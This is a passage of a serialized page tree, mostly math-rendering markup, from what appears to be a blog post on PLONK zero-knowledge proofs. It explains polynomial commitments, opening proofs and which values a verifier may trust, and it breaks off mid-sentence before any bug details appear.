",{"type":27,"tag":84,"props":150306,"children":150308},{"className":150307},[11266,11267],[150309],{"type":27,"tag":207,"props":150310,"children":150312},{"className":150311},[11272],[150313],{"type":27,"tag":207,"props":150314,"children":150316},{"className":150315,"ariaHidden":11278},[11277],[150317],{"type":27,"tag":207,"props":150318,"children":150320},{"className":150319},[11283],[150321,150325,150330,150335,150340],{"type":27,"tag":207,"props":150322,"children":150324},{"className":150323,"style":11393},[11288],[],{"type":27,"tag":207,"props":150326,"children":150328},{"className":150327,"style":29392},[11294,28860],[150329],{"type":33,"value":150198},{"type":27,"tag":207,"props":150331,"children":150333},{"className":150332},[28989],[150334],{"type":33,"value":1343},{"type":27,"tag":207,"props":150336,"children":150338},{"className":150337},[11294,28860],[150339],{"type":33,"value":26546},{"type":27,"tag":207,"props":150341,"children":150343},{"className":150342},[29011],[150344],{"type":33,"value":10416},{"type":33,"value":150346}," divides ",{"type":27,"tag":84,"props":150348,"children":150350},{"className":150349},[11266,11267],[150351],{"type":27,"tag":207,"props":150352,"children":150354},{"className":150353},[11272],[150355],{"type":27,"tag":207,"props":150356,"children":150358},{"className":150357,"ariaHidden":11278},[11277],[150359],{"type":27,"tag":207,"props":150360,"children":150362},{"className":150361},[11283],[150363,150367,150372,150377,150382],{"type":27,"tag":207,"props":150364,"children":150366},{"className":150365,"style":11393},[11288],[],{"type":27,"tag":207,"props":150368,"children":150370},{"className":150369,"style":28861},[11294,28860],[150371],{"type":33,"value":129028},{"type":27,"tag":207,"props":150373,"children":150375},{"className":150374},[28989],[150376],{"type":33,"value":1343},{"type":27,"tag":207,"props":150378,"children":150380},{"className":150379},[11294,28860],[150381],{"type":33,"value":26546},{"type":27,"tag":207,"props":150383,"children":150385},{"className":150384},[29011],[150386],{"type":33,"value":10416},{"type":33,"value":150388},", yielding a quotient polynomial ",{"type":27,"tag":84,"props":150390,"children":150392},{"className":150391},[11266,11267],[150393],{"type":27,"tag":207,"props":150394,"children":150396},{"className":150395},[11272],[150397],{"type":27,"tag":207,"props":150398,"children":150400},{"className":150399,"ariaHidden":11278},[11277],[150401],{"type":27,"tag":207,"props":150402,"children":150404},{"className":150403},[11283],[150405,150409,150414,150419,150424],{"type":27,"tag":207,"props":150406,"children":150408},{"className":150407,"style":11393},[11288],[],{"type":27,"tag":207,"props":150410,"children":150412},{"className":150411,"style":28861},[11294,28860],[150413],{"type":33,"value":13269},{"type":27,"tag":207,"props":150415,"children":150417},{"className":150416},[28989],[150418],{"type":33,"value":1343},{"type":27,"tag":207,"props":150420,"children":150422},{"className":150421},[11294,28860],[150423],{"type":33,"value":26546},{"type":27,"tag":207,"props":150425,"children":150427},{"className":150426},[29011],[150428],{"type":33,"value":10416},{"type":33,"value":28776},{"type":27,"tag":84,"props":150431,"children":150433},{"className":150432},[11266,11267],[150434],{"type":27,"tag":207,"props":150435,"children":150437},{"className":150436},[11272],[150438],{"type":27,"tag":207,"props":150439,"children":150441},{"className":150440,"ariaHidden":11278},[11277],[150442,150483,150524],{"type":27,"tag":207,"props":150443,"children":150445},{"className":150444},[11283],[150446,150450,150455,150460,150465,150470,150474,150479],{"type":27,"tag":207,"props":150447,"children":150449},{"className":150448,"style":11393},[11288],[],{"type":27,"tag":207,"props":150451,"children":150453},{"className":150452,"style":28861},[11294,28860],[150454],{"type":33,"value":129028},{"type":27,"tag":207,"props":150456,"children":150458},{"className":150457},[28989],[150459],{"type":33,"value":1343},{"type":27,"tag":207,"props":150461,"children":150463},{"className":150462},[11294,28860],[150464],{"type":33,"value":26546},{"type":27,"tag":207,"props":150466,"children":150468},{"className":150467},[29011],[150469],{"type":33,"value":10416},{"type":27,"tag":207,"props":150471,"children":150473},{"className":150472,"style":11470},[11372],[],{"type":27,"tag":207,"props":150475,"children":150477},{"className":150476},[11475],[150478],{"type":33,"value":10380},{"type":27,"tag":207,"props":150480,"children":150482},{"className":150481,"style":11470},[11372],[],{"type":27,"tag":207,"props":150484,"children":150486},{"className":150485},[11283],[150487,150491,150496,150501,150506,150511,150515,150520],{"type":27,"tag":207,"props":150488,"children":150490},{"className":150489,"style":11393},[11288],[],{"type":27,"tag":207,"props":150492,"children":150494},{"className":150493,"style":28861},[11294,28860],[150495],{"type":33,"value":13269},{"type":27,"tag":207,"props":150497,"children":150499},{"className":150498},[28989],[150500],{"type":33,"value":1343},{"type":27,"tag":207,"props":150502,"children":150504},{"className":150503},[11294,28860],[150505],{"type":33,"value":26546},{"type":27,"tag":207,"props":150507,"children":150509},{"className":150508},[29011],[150510],{"type":33,"value":10416},{"type":27,"tag":207,"props":150512,"children":150514},{"className":150513,"style":11373},[11372],[],{"type":27,"tag":207,"props":150516,"children":150518},{"className":150517},[11378],[150519],{"type":33,"value":118513},{"type":27,"tag":207,"props":150521,"children":150523},{"className":150522,"style":11373},[11372],[],{"type":27,"tag":207,"props":150525,"children":150527},{"className":150526},[11283],[150528,150532,150537,150542,150547],{"type":27,"tag":207,"props":150529,"children":150531},{"className":150530,"style":11393},[11288],[],{"type":27,"tag":207,"props":150533,"children":150535},{"className":150534,"style":29392},[11294,28860],[150536],{"type":33,"value":150198},{"type":27,"tag":207,"props":150538,"children":150540},{"className":150539},[28989],[150541],{"type":33,"value":1343},{"type":27,"tag":207,"props":150543,"children":150545},{"className":150544},[11294,28860],[150546],{"type":33,"value":26546},{"type":27,"tag":207,"props":150548,"children":150550},{"className":150549},[29011],[150551],{"type":33,"value":10416},{"type":33,"value":1041},{"type":27,"tag":36,"props":150554,"children":150555},{},[150556],{"type":27,"tag":126,"props":150557,"children":150560},{"alt":150558,"src":150559},"master_equation","/posts/dusk-commitment-issues/master_equation.svg",[],{"type":27,"tag":58,"props":150562,"children":150564},{"id":150563},"polynomial-commitments-and-opening-proofs",[150565],{"type":33,"value":150566},"Polynomial commitments and opening proofs",{"type":27,"tag":36,"props":150568,"children":150569},{},[150570,150572,150577,150579,150584],{"type":33,"value":150571},"To keep the proof short, the prover doesn't send polynomials directly. Instead, it sends ",{"type":27,"tag":942,"props":150573,"children":150574},{},[150575],{"type":33,"value":150576},"commitments",{"type":33,"value":150578},", short cryptographic fingerprints of each polynomial (using e.g. KZG commitments). When the verifier needs the value of a committed polynomial at a specific point, the prover provides the value along with an ",{"type":27,"tag":942,"props":150580,"children":150581},{},[150582],{"type":33,"value":150583},"opening proof",{"type":33,"value":150585}," that the claimed value is consistent with the earlier commitment.",{"type":27,"tag":36,"props":150587,"children":150588},{},[150589],{"type":33,"value":150590},"A committed polynomial evaluation is therefore cryptographically bound, and the prover cannot lie about the value without being caught.",{"type":27,"tag":58,"props":150592,"children":150594},{"id":150593},"reducing-to-a-single-random-point",[150595],{"type":33,"value":150596},"Reducing to a single random point",{"type":27,"tag":36,"props":150598,"children":150599},{},[150600,150602,150642,150644,150669,150671,150793,150795,150820],{"type":33,"value":150601},"After the prover commits to all polynomials, including ",{"type":27,"tag":84,"props":150603,"children":150605},{"className":150604},[11266,11267],[150606],{"type":27,"tag":207,"props":150607,"children":150609},{"className":150608},[11272],[150610],{"type":27,"tag":207,"props":150611,"children":150613},{"className":150612,"ariaHidden":11278},[11277],[150614],{"type":27,"tag":207,"props":150615,"children":150617},{"className":150616},[11283],[150618,150622,150627,150632,150637],{"type":27,"tag":207,"props":150619,"children":150621},{"className":150620,"style":11393},[11288],[],{"type":27,"tag":207,"props":150623,"children":150625},{"className":150624,"style":28861},[11294,28860],[150626],{"type":33,"value":13269},{"type":27,"tag":207,"props":150628,"children":150630},{"className":150629},[28989],[150631],{"type":33,"value":1343},{"type":27,"tag":207,"props":150633,"children":150635},{"className":150634},[11294,28860],[150636],{"type":33,"value":26546},{"type":27,"tag":207,"props":150638,"children":150640},{"className":150639},[29011],[150641],{"type":33,"value":10416},{"type":33,"value":150643},", the verifier picks a random challenge point ",{"type":27,"tag":84,"props":150645,"children":150647},{"className":150646},[11266,11267],[150648],{"type":27,"tag":207,"props":150649,"children":150651},{"className":150650},[11272],[150652],{"type":27,"tag":207,"props":150653,"children":150655},{"className":150654,"ariaHidden":11278},[11277],[150656],{"type":27,"tag":207,"props":150657,"children":150659},{"className":150658},[11283],[150660,150664],{"type":27,"tag":207,"props":150661,"children":150663},{"className":150662,"style":118092},[11288],[],{"type":27,"tag":207,"props":150665,"children":150667},{"className":150666,"style":120808},[11294,28860],[150668],{"type":33,"value":120811},{"type":33,"value":150670}," (derived via the Fiat-Shamir heuristic from the transcript) and checks ",{"type":27,"tag":84,"props":150672,"children":150674},{"className":150673},[11266,11267],[150675],{"type":27,"tag":207,"props":150676,"children":150678},{"className":150677},[11272],[150679],{"type":27,"tag":207,"props":150680,"children":150682},{"className":150681,"ariaHidden":11278},[11277],[150683,150724,150765],{"type":27,"tag":207,"props":150684,"children":150686},{"className":150685},[11283],[150687,150691,150696,150701,150706,150711,150715,150720],{"type":27,"tag":207,"props":150688,"children":150690},{"className":150689,"style":11393},[11288],[],{"type":27,"tag":207,"props":150692,"children":150694},{"className":150693,"style":28861},[11294,28860],[150695],{"type":33,"value":129028},{"type":27,"tag":207,"props":150697,"children":150699},{"className":150698},[28989],[150700],{"type":33,"value":1343},{"type":27,"tag":207,"props":150702,"children":150704},{"className":150703,"style":120808},[11294,28860],[150705],{"type":33,"value":120811},{"type":27,"tag":207,"props":150707,"children":150709},{"className":150708},[29011],[150710],{"type":33,"value":10416},{"type":27,"tag":207,"props":150712,"children":150714},{"className":150713,"style":11470},[11372],[],{"type":27,"tag":207,"props":150716,"children":150718},{"className":150717},[11475],[150719],{"type":33,"value":10380},{"type":27,"tag":207,"props":150721,"children":150723},{"className":150722,"style":11470},[11372],[],{"type":27,"tag":207,"props":150725,"children":150727},{"className":150726},[11283],[150728,150732,150737,150742,150747,150752,150756,150761],{"type":27,"tag":207,"props":150729,"children":150731},{"className":150730,"style":11393},[11288],[],{"type":27,"tag":207,"props":150733,"children":150735},{"className":150734,"style":28861},[11294,28860],[150736],{"type":33,"value":13269},{"type":27,"tag":207,"props":150738,"children":150740},{"className":150739},[28989],[150741],{"type":33,"value":1343},{"type":27,"tag":207,"props":150743,"children":150745},{"className":150744,"style":120808},[11294,28860],[150746],{"type":33,"value":120811},{"type":27,"tag":207,"props":150748,"children":150750},{"className":150749},[29011],[150751],{"type":33,"value":10416},{"type":27,"tag":207,"props":150753,"children":150755},{"className":150754,"style":11373},[11372],[],{"type":27,"tag":207,"props":150757,"children":150759},{"className":150758},[11378],[150760],{"type":33,"value":118513},{"type":27,"tag":207,"props":150762,"children":150764},{"className":150763,"style":11373},[11372],[],{"type":27,"tag":207,"props":150766,"children":150768},{"className":150767},[11283],[150769,150773,150778,150783,150788],{"type":27,"tag":207,"props":150770,"children":150772},{"className":150771,"style":11393},[11288],[],{"type":27,"tag":207,"props":150774,"children":150776},{"className":150775,"style":29392},[11294,28860],[150777],{"type":33,"value":150198},{"type":27,"tag":207,"props":150779,"children":150781},{"className":150780},[28989],[150782],{"type":33,"value":1343},{"type":27,"tag":207,"props":150784,"children":150786},{"className":150785,"style":120808},[11294,28860],[150787],{"type":33,"value":120811},{"type":27,"tag":207,"props":150789,"children":150791},{"className":150790},[29011],[150792],{"type":33,"value":10416},{"type":33,"value":150794}," at that single point. By the Schwartz-Zippel lemma, if this holds at a random ",{"type":27,"tag":84,"props":150796,"children":150798},{"className":150797},[11266,11267],[150799],{"type":27,"tag":207,"props":150800,"children":150802},{"className":150801},[11272],[150803],{"type":27,"tag":207,"props":150804,"children":150806},{"className":150805,"ariaHidden":11278},[11277],[150807],{"type":27,"tag":207,"props":150808,"children":150810},{"className":150809},[11283],[150811,150815],{"type":27,"tag":207,"props":150812,"children":150814},{"className":150813,"style":118092},[11288],[],{"type":27,"tag":207,"props":150816,"children":150818},{"className":150817,"style":120808},[11294,28860],[150819],{"type":33,"value":120811},{"type":33,"value":150821}," then the full polynomial identity holds with overwhelming probability, so the verifier checks the entire multi-million-row circuit in constant time.",{"type":27,"tag":36,"props":150823,"children":150824},{},[150825,150827,150852,150854,150859],{"type":33,"value":150826},"In textbook PLONK the selector polynomials are part of the fixed circuit description, but in practice implementations commit to them during preprocessing and place those commitments in the verifier key. When the verifier later needs their values at ",{"type":27,"tag":84,"props":150828,"children":150830},{"className":150829},[11266,11267],[150831],{"type":27,"tag":207,"props":150832,"children":150834},{"className":150833},[11272],[150835],{"type":27,"tag":207,"props":150836,"children":150838},{"className":150837,"ariaHidden":11278},[11277],[150839],{"type":27,"tag":207,"props":150840,"children":150842},{"className":150841},[11283],[150843,150847],{"type":27,"tag":207,"props":150844,"children":150846},{"className":150845,"style":118092},[11288],[],{"type":27,"tag":207,"props":150848,"children":150850},{"className":150849,"style":120808},[11294,28860],[150851],{"type":33,"value":120811},{"type":33,"value":150853},", the prover supplies ",{"type":27,"tag":942,"props":150855,"children":150856},{},[150857],{"type":33,"value":150858},"evaluation claims",{"type":33,"value":150860}," that must be checked against those commitments with opening proofs.",{"type":27,"tag":36,"props":150862,"children":150863},{},[150864,150866,150870],{"type":33,"value":150865},"The security argument depends on a chain: commitments lock the prover into polynomials ",{"type":27,"tag":942,"props":150867,"children":150868},{},[150869],{"type":33,"value":111796},{"type":33,"value":150871}," challenges are derived, and opening proofs ensure the evaluations are consistent with those commitments. Breaking any single link in this chain collapses soundness entirely.",{"type":27,"tag":58,"props":150873,"children":150875},{"id":150874},"what-the-verifier-is-actually-allowed-to-trust",[150876],{"type":33,"value":150877},"What the verifier is actually allowed to trust",{"type":27,"tag":36,"props":150879,"children":150880},{},[150881,150883,150888],{"type":33,"value":150882},"For this bug, one invariant matters more than the rest: ",{"type":27,"tag":12606,"props":150884,"children":150885},{},[150886],{"type":33,"value":150887},"every scalar that enters the final verifier equation must be either locally computed by the verifier, or cryptographically tied to an earlier commitment",{"type":33,"value":1041},{"type":27,"tag":36,"props":150890,"children":150891},{},[150892,150894,150986,150987,151079,151081,151106,151108,151148,151149,151189,151190,151283,151284,151330,151332,151419,151420,151507,151508,151595],{"type":33,"value":150893},"In practice, values entering the verifier equation fall into three buckets. The verifier computes some values locally from public data (",{"type":27,"tag":84,"props":150895,"children":150897},{"className":150896},[11266,11267],[150898],{"type":27,"tag":207,"props":150899,"children":150901},{"className":150900},[11272],[150902],{"type":27,"tag":207,"props":150903,"children":150905},{"className":150904,"ariaHidden":11278},[11277],[150906],{"type":27,"tag":207,"props":150907,"children":150909},{"className":150908},[11283],[150910,150914,150971,150976,150981],{"type":27,"tag":207,"props":150911,"children":150913},{"className":150912,"style":11393},[11288],[],{"type":27,"tag":207,"props":150915,"children":150917},{"className":150916},[11294],[150918,150923],{"type":27,"tag":207,"props":150919,"children":150921},{"className":150920,"style":29392},[11294,28860],[150922],{"type":33,"value":150198},{"type":27,"tag":207,"props":150924,"children":150926},{"className":150925},[11309],[150927],{"type":27,"tag":207,"props":150928,"children":150930},{"className":150929},[11314,28914],[150931,150960],{"type":27,"tag":207,"props":150932,"children":150934},{"className":150933},[11319],[150935,150955],{"type":27,"tag":207,"props":150936,"children":150938},{"className":150937,"style":149189},[11324],[150939],{"type":27,"tag":207,"props":150940,"children":150941},{"style":123499},[150942,150946],{"type":27,"tag":207,"props":150943,"children":150945},{"className":150944,"style":11334},[11333],[],{"type":27,"tag":207,"props":150947,"children":150949},{"className":150948},[11339,11340,11341,11342],[150950],{"type":27,"tag":207,"props":150951,"children":150953},{"className":150952,"style":100498},[11294,28860,11342],[150954],{"type":33,"value":100501},{"type":27,"tag":207,"props":150956,"children":150958},{"className":150957},[29017],[150959],{"type":33,"value":29020},{"type":27,"tag":207,"props":150961,"children":150963},{"className":150962},[11319],[150964],{"type":27,"tag":207,"props":150965,"children":150967},{"className":150966,"style":100347},[11324],[150968],{"type":27,"tag":207,"props":150969,"children":150970},{},[],{"type":27,"tag":207,"props":150972,"children":150974},{"className":150973},[28989],[150975],{"type":33,"value":1343},{"type":27,"tag":207,"props":150977,"children":150979},{"className":150978,"style":120808},[11294,28860],[150980],{"type":33,"value":120811},{"type":27,"tag":207,"props":150982,"children":150984},{"className":150983},[29011],[150985],{"type":33,"value":10416},{"type":33,"value":1123},{"type":27,"tag":84,"props":150988,"children":150990},{"className":150989},[11266,11267],[150991],{"type":27,"tag":207,"props":150992,"children":150994},{"className":150993},[11272],[150995],{"type":27,"tag":207,"props":150996,"children":150998},{"className":150997,"ariaHidden":11278},[11277],[150999],{"type":27,"tag":207,"props":151000,"children":151002},{"className":151001},[11283],[151003,151007,151064,151069,151074],{"type":27,"tag":207,"props":151004,"children":151006},{"className":151005,"style":11393},[11288],[],{"type":27,"tag":207,"props":151008,"children":151010},{"className":151009},[11294],[151011,151016],{"type":27,"tag":207,"props":151012,"children":151014},{"className":151013},[11294,28860],[151015],{"type":33,"value":125214},{"type":27,"tag":207,"props":151017,"children":151019},{"className":151018},[11309],[151020],{"type":27,"tag":207,"props":151021,"children":151023},{"className":151022},[11314,28914],[151024,151053],{"type":27,"tag":207,"props":151025,"children":151027},{"className":151026},[11319],[151028,151048],{"type":27,"tag":207,"props":151029,"children":151031},{"className":151030,"style":100316},[11324],[151032],{"type":27,"tag":207,"props":151033,"children":151034},{"style":100320},[151035,151039],{"type":27,"tag":207,"props":151036,"children":151038},{"className":151037,"style":11334},[11333],[],{"type":27,"tag":207,"props":151040,"children":151042},{"className":151041},[11339,11340,11341,11342],[151043],{"type":27,"tag":207,"props":151044,"children":151046},{"className":151045},[11294,11342],[151047],{"type":33,"value":1651},{"type":27,"tag":207,"props":151049,"children":151051},{"className":151050},[29017],[151052],{"type":33,"value":29020},{"type":27,"tag":207,"props":151054,"children":151056},{"className":151055},[11319],[151057],{"type":27,"tag":207,"props":151058,"children":151060},{"className":151059,"style":100347},[11324],[151061],{"type":27,"tag":207,"props":151062,"children":151063},{},[],{"type":27,"tag":207,"props":151065,"children":151067},{"className":151066},[28989],[151068],{"type":33,"value":1343},{"type":27,"tag":207,"props":151070,"children":151072},{"className":151071,"style":120808},[11294,28860],[151073],{"type":33,"value":120811},{"type":27,"tag":207,"props":151075,"children":151077},{"className":151076},[29011],[151078],{"type":33,"value":10416},{"type":33,"value":151080},", the public-input polynomial at ",{"type":27,"tag":84,"props":151082,"children":151084},{"className":151083},[11266,11267],[151085],{"type":27,"tag":207,"props":151086,"children":151088},{"className":151087},[11272],[151089],{"type":27,"tag":207,"props":151090,"children":151092},{"className":151091,"ariaHidden":11278},[11277],[151093],{"type":27,"tag":207,"props":151094,"children":151096},{"className":151095},[11283],[151097,151101],{"type":27,"tag":207,"props":151098,"children":151100},{"className":151099,"style":118092},[11288],[],{"type":27,"tag":207,"props":151102,"children":151104},{"className":151103,"style":120808},[11294,28860],[151105],{"type":33,"value":120811},{"type":33,"value":151107},"), which are safe because the prover never chooses them. Other values are prover-supplied evaluations accompanied by KZG opening proofs (",{"type":27,"tag":84,"props":151109,"children":151111},{"className":151110},[11266,11267],[151112],{"type":27,"tag":207,"props":151113,"children":151115},{"className":151114},[11272],[151116],{"type":27,"tag":207,"props":151117,"children":151119},{"className":151118,"ariaHidden":11278},[11277],[151120],{"type":27,"tag":207,"props":151121,"children":151123},{"className":151122},[11283],[151124,151128,151133,151138,151143],{"type":27,"tag":207,"props":151125,"children":151127},{"className":151126,"style":11393},[11288],[],{"type":27,"tag":207,"props":151129,"children":151131},{"className":151130},[11294,28860],[151132],{"type":33,"value":47},{"type":27,"tag":207,"props":151134,"children":151136},{"className":151135},[28989],[151137],{"type":33,"value":1343},{"type":27,"tag":207,"props":151139,"children":151141},{"className":151140,"style":120808},[11294,28860],[151142],{"type":33,"value":120811},{"type":27,"tag":207,"props":151144,"children":151146},{"className":151145},[29011],[151147],{"type":33,"value":10416},{"type":33,"value":1123},{"type":27,"tag":84,"props":151150,"children":151152},{"className":151151},[11266,11267],[151153],{"type":27,"tag":207,"props":151154,"children":151156},{"className":151155},[11272],[151157],{"type":27,"tag":207,"props":151158,"children":151160},{"className":151159,"ariaHidden":11278},[11277],[151161],{"type":27,"tag":207,"props":151162,"children":151164},{"className":151163},[11283],[151165,151169,151174,151179,151184],{"type":27,"tag":207,"props":151166,"children":151168},{"className":151167,"style":11393},[11288],[],{"type":27,"tag":207,"props":151170,"children":151172},{"className":151171},[11294,28860],[151173],{"type":33,"value":10512},{"type":27,"tag":207,"props":151175,"children":151177},{"className":151176},[28989],[151178],{"type":33,"value":1343},{"type":27,"tag":207,"props":151180,"children":151182},{"className":151181,"style":120808},[11294,28860],[151183],{"type":33,"value":120811},{"type":27,"tag":207,"props":151185,"children":151187},{"className":151186},[29011],[151188],{"type":33,"value":10416},{"type":33,"value":1123},{"type":27,"tag":84,"props":151191,"children":151193},{"className":151192},[11266,11267],[151194],{"type":27,"tag":207,"props":151195,"children":151197},{"className":151196},[11272],[151198],{"type":27,"tag":207,"props":151199,"children":151201},{"className":151200,"ariaHidden":11278},[11277],[151202],{"type":27,"tag":207,"props":151203,"children":151205},{"className":151204},[11283],[151206,151210,151268,151273,151278],{"type":27,"tag":207,"props":151207,"children":151209},{"className":151208,"style":11393},[11288],[],{"type":27,"tag":207,"props":151211,"children":151213},{"className":151212},[11294],[151214,151220],{"type":27,"tag":207,"props":151215,"children":151217},{"className":151216,"style":100750},[11294,28860],[151218],{"type":33,"value":151219},"σ",{"type":27,"tag":207,"props":151221,"children":151223},{"className":151222},[11309],[151224],{"type":27,"tag":207,"props":151225,"children":151227},{"className":151226},[11314,28914],[151228,151257],{"type":27,"tag":207,"props":151229,"children":151231},{"className":151230},[11319],[151232,151252],{"type":27,"tag":207,"props":151233,"children":151235},{"className":151234,"style":100316},[11324],[151236],{"type":27,"tag":207,"props":151237,"children":151238},{"style":100797},[151239,151243],{"type":27,"tag":207,"props":151240,"children":151242},{"className":151241,"style":11334},[11333],[],{"type":27,"tag":207,"props":151244,"children":151246},{"className":151245},[11339,11340,11341,11342],[151247],{"type":27,"tag":207,"props":151248,"children":151250},{"className":151249},[11294,11342],[151251],{"type":33,"value":1651},{"type":27,"tag":207,"props":151253,"children":151255},{"className":151254},[29017],[151256],{"type":33,"value":29020},{"type":27,"tag":207,"props":151258,"children":151260},{"className":151259},[11319],[151261],{"type":27,"tag":207,"props":151262,"children":151264},{"className":151263,"style":100347},[11324],[151265],{"type":27,"tag":207,"props":151266,"children":151267},{},[],{"type":27,"tag":207,"props":151269,"children":151271},{"className":151270},[28989],[151272],{"type":33,"value":1343},{"type":27,"tag":207,"props":151274,"children":151276},{"className":151275,"style":120808},[11294,28860],[151277],{"type":33,"value":120811},{"type":27,"tag":207,"props":151279,"children":151281},{"className":151280},[29011],[151282],{"type":33,"value":10416},{"type":33,"value":1123},{"type":27,"tag":84,"props":151285,"children":151287},{"className":151286},[11266,11267],[151288],{"type":27,"tag":207,"props":151289,"children":151291},{"className":151290},[11272],[151292],{"type":27,"tag":207,"props":151293,"children":151295},{"className":151294,"ariaHidden":11278},[11277],[151296],{"type":27,"tag":207,"props":151297,"children":151299},{"className":151298},[11283],[151300,151304,151309,151314,151319,151325],{"type":27,"tag":207,"props":151301,"children":151303},{"className":151302,"style":11393},[11288],[],{"type":27,"tag":207,"props":151305,"children":151307},{"className":151306},[11294,28860],[151308],{"type":33,"value":47},{"type":27,"tag":207,"props":151310,"children":151312},{"className":151311},[28989],[151313],{"type":33,"value":1343},{"type":27,"tag":207,"props":151315,"children":151317},{"className":151316,"style":120808},[11294,28860],[151318],{"type":33,"value":120811},{"type":27,"tag":207,"props":151320,"children":151322},{"className":151321,"style":100750},[11294,28860],[151323],{"type":33,"value":151324},"ω",{"type":27,"tag":207,"props":151326,"children":151328},{"className":151327},[29011],[151329],{"type":33,"value":10416},{"type":33,"value":151331},"), which are safe because the opening binds them to previously committed polynomials. A third category consists of verifier-key commitments used directly in the linearization multiscalar multiplication (",{"type":27,"tag":84,"props":151333,"children":151335},{"className":151334},[11266,11267],[151336],{"type":27,"tag":207,"props":151337,"children":151339},{"className":151338},[11272],[151340],{"type":27,"tag":207,"props":151341,"children":151343},{"className":151342,"ariaHidden":11278},[11277],[151344],{"type":27,"tag":207,"props":151345,"children":151347},{"className":151346},[11283],[151348,151352,151357,151414],{"type":27,"tag":207,"props":151349,"children":151351},{"className":151350,"style":11393},[11288],[],{"type":27,"tag":207,"props":151353,"children":151355},{"className":151354},[28989],[151356],{"type":33,"value":11019},{"type":27,"tag":207,"props":151358,"children":151360},{"className":151359},[11294],[151361,151366],{"type":27,"tag":207,"props":151362,"children":151364},{"className":151363,"style":100750},[11294,28860],[151365],{"type":33,"value":100753},{"type":27,"tag":207,"props":151367,"children":151369},{"className":151368},[11309],[151370],{"type":27,"tag":207,"props":151371,"children":151373},{"className":151372},[11314,28914],[151374,151403],{"type":27,"tag":207,"props":151375,"children":151377},{"className":151376},[11319],[151378,151398],{"type":27,"tag":207,"props":151379,"children":151381},{"className":151380,"style":149189},[11324],[151382],{"type":27,"tag":207,"props":151383,"children":151384},{"style":100797},[151385,151389],{"type":27,"tag":207,"props":151386,"children":151388},{"className":151387,"style":11334},[11333],[],{"type":27,"tag":207,"props":151390,"children":151392},{"className":151391},[11339,11340,11341,11342],[151393],{"type":27,"tag":207,"props":151394,"children":151396},{"className":151395,"style":102272},[11294,28860,11342],[151397],{"type":33,"value":102275},{"type":27,"tag":207,"props":151399,"children":151401},{"className":151400},[29017],[151402],{"type":33,"value":29020},{"type":27,"tag":207,"props":151404,"children":151406},{"className":151405},[11319],[151407],{"type":27,"tag":207,"props":151408,"children":151410},{"className":151409,"style":100347},[11324],[151411],{"type":27,"tag":207,"props":151412,"children":151413},{},[],{"type":27,"tag":207,"props":151415,"children":151417},{"className":151416},[29011],[151418],{"type":33,"value":22686},{"type":33,"value":1123},{"type":27,"tag":84,"props":151421,"children":151423},{"className":151422},[11266,11267],[151424],{"type":27,"tag":207,"props":151425,"children":151427},{"className":151426},[11272],[151428],{"type":27,"tag":207,"props":151429,"children":151431},{"className":151430,"ariaHidden":11278},[11277],[151432],{"type":27,"tag":207,"props":151433,"children":151435},{"className":151434},[11283],[151436,151440,151445,151502],{"type":27,"tag":207,"props":151437,"children":151439},{"className":151438,"style":11393},[11288],[],{"type":27,"tag":207,"props":151441,"children":151443},{"className":151442},[28989],[151444],{"type":33,"value":11019},{"type":27,"tag":207,"props":151446,"children":151448},{"className":151447},[11294],[151449,151454],{"type":27,"tag":207,"props":151450,"children":151452},{"className":151451,"style":100750},[11294,28860],[151453],{"type":33,"value":100753},{"type":27,"tag":207,"props":151455,"children":151457},{"className":151456},[11309],[151458],{"type":27,"tag":207,"props":151459,"children":151461},{"className":151460},[11314,28914],[151462,151491],{"type":27,"tag":207,"props":151463,"children":151465},{"className":151464},[11319],[151466,151486],{"type":27,"tag":207,"props":151467,"children":151469},{"className":151468,"style":149189},[11324],[151470],{"type":27,"tag":207,"props":151471,"children":151472},{"style":100797},[151473,151477],{"type":27,"tag":207,"props":151474,"children":151476},{"className":151475,"style":11334},[11333],[],{"type":27,"tag":207,"props":151478,"children":151480},{"className":151479},[11339,11340,11341,11342],[151481],{"type":27,"tag":207,"props":151482,"children":151484},{"className":151483,"style":100264},[11294,28860,11342],[151485],{"type":33,"value":122569},{"type":27,"tag":207,"props":151487,"children":151489},{"className":151488},[29017],[151490],{"type":33,"value":29020},{"type":27,"tag":207,"props":151492,"children":151494},{"className":151493},[11319],[151495],{"type":27,"tag":207,"props":151496,"children":151498},{"className":151497,"style":100347},[11324],[151499],{"type":27,"tag":207,"props":151500,"children":151501},{},[],{"type":27,"tag":207,"props":151503,"children":151505},{"className":151504},[29011],[151506],{"type":33,"value":22686},{"type":33,"value":1123},{"type":27,"tag":84,"props":151509,"children":151511},{"className":151510},[11266,11267],[151512],{"type":27,"tag":207,"props":151513,"children":151515},{"className":151514},[11272],[151516],{"type":27,"tag":207,"props":151517,"children":151519},{"className":151518,"ariaHidden":11278},[11277],[151520],{"type":27,"tag":207,"props":151521,"children":151523},{"className":151522},[11283],[151524,151528,151533,151590],{"type":27,"tag":207,"props":151525,"children":151527},{"className":151526,"style":11393},[11288],[],{"type":27,"tag":207,"props":151529,"children":151531},{"className":151530},[28989],[151532],{"type":33,"value":11019},{"type":27,"tag":207,"props":151534,"children":151536},{"className":151535},[11294],[151537,151542],{"type":27,"tag":207,"props":151538,"children":151540},{"className":151539,"style":100750},[11294,28860],[151541],{"type":33,"value":151219},{"type":27,"tag":207,"props":151543,"children":151545},{"className":151544},[11309],[151546],{"type":27,"tag":207,"props":151547,"children":151549},{"className":151548},[11314,28914],[151550,151579],{"type":27,"tag":207,"props":151551,"children":151553},{"className":151552},[11319],[151554,151574],{"type":27,"tag":207,"props":151555,"children":151557},{"className":151556,"style":100316},[11324],[151558],{"type":27,"tag":207,"props":151559,"children":151560},{"style":100797},[151561,151565],{"type":27,"tag":207,"props":151562,"children":151564},{"className":151563,"style":11334},[11333],[],{"type":27,"tag":207,"props":151566,"children":151568},{"className":151567},[11339,11340,11341,11342],[151569],{"type":27,"tag":207,"props":151570,"children":151572},{"className":151571},[11294,11342],[151573],{"type":33,"value":1693},{"type":27,"tag":207,"props":151575,"children":151577},{"className":151576},[29017],[151578],{"type":33,"value":29020},{"type":27,"tag":207,"props":151580,"children":151582},{"className":151581},[11319],[151583],{"type":27,"tag":207,"props":151584,"children":151586},{"className":151585,"style":100347},[11324],[151587],{"type":27,"tag":207,"props":151588,"children":151589},{},[],{"type":27,"tag":207,"props":151591,"children":151593},{"className":151592},[29011],[151594],{"type":33,"value":22686},{"type":33,"value":151596},"), which are safe because the verifier never trusts a bare field element for these; it uses the commitment itself.",{"type":27,"tag":36,"props":151598,"children":151599},{},[151600],{"type":33,"value":151601},"Any term that falls outside those three categories is attacker-controlled by 